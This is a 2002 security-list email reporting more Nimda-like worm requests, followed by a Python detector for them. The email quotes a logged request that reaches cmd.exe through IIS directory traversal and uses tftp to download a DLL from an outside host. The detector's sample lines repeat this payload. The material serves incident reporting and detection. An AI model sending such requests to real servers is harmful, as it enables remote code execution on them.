Increase in Nimda/Code Red Variants - New Requests Made
From: Joshua_Hiller@aeanet.org
Date: 02/27/02
To: incidents@securityfocus.com
From: Joshua_Hiller@aeanet.org
Date: Tue, 26 Feb 2002 18:10:59 -0800
I am also seeing an upsurge in Nimda-like exploit requests.
This is just one example.
http://www.myserver.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2065.197180.98%20GET%20cool.dll%20c:\httpodbc.dll.
User's IP: 65.197.180.98
New DLLs are showing up in these requests, although the methods of
execution remain the same. Perhaps someone has thrashed another core
IIS/Win32 dll and is attempting to exploit? Pretty sure httpodbc.dll is in
use by IIS and my ODBC connections. (Correct me if I'm wrong ... ;))
Another thing I've noticed is the number of requests per IP has gone up.
Usually I'd get about 20 - 30 requests, now I'm receiving anywhere between
50 and 80 from the infected host.
It does still appear to be automated / worm activity.
Just thought I'd let the lists know. ;-)
Joshua Hiller
Manager Web Operations
AeA
Advancing the Business of Technology
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
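
A defender-side way to flag requests like the one quoted in the message above and to count them per source address, added here as an example and not part of the original post. The "source-IP URI" line format, the function names and the sample lines (constructed, using documentation addresses) are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

TRAVERSAL = re.compile(rb"\.\.[/\\]")
TFTP = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)\s+(\S+)", re.I)

def fold_overlong(raw: bytes) -> bytes:
    """Map 2-byte overlong UTF-8 (lead byte 0xC0/0xC1, never valid) to ASCII."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            # e.g. C1 9C -> (1 << 6) | 0x1C = 0x5C, a backslash
            out.append((raw[i] & 0x1F) << 6 | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)

def classify(uri: str):
    """Return details if the URI is a traversal to cmd.exe, else None."""
    path, _, query = uri.partition("?")
    raw = unquote_to_bytes(path)
    folded = fold_overlong(raw)
    decoded = folded.lower()
    if not (TRAVERSAL.search(decoded) and decoded.endswith(b"cmd.exe")):
        return None
    cmd = unquote_to_bytes(query.replace("+", " ")).decode("latin-1")
    m = TFTP.search(cmd)  # (tftp host, remote file, local path) if present
    return {"overlong": raw != folded, "command": cmd,
            "tftp": m.groups() if m else None}

def summarize(lines):
    """Count flagged requests per source and collect tftp drop paths."""
    hits, drops = Counter(), {}
    for line in lines:
        src, uri = line.split(None, 1)
        info = classify(uri.strip())
        if info:
            hits[src] += 1
            if info["tftp"]:
                drops.setdefault(src, set()).add(info["tftp"][2].lower())
    return hits, drops

SAMPLE = [  # constructed log lines, not taken from the post
    r"192.0.2.10 /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20cool.dll%20c:\httpodbc.dll",
    r"192.0.2.10 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    r"198.51.100.7 /caf%c3%a9/menu.asp?id=42",
]
```

Tracking the per-source counter over time shows the kind of jump in requests per host described in the message, and the collected drop paths show when a new DLL name starts appearing.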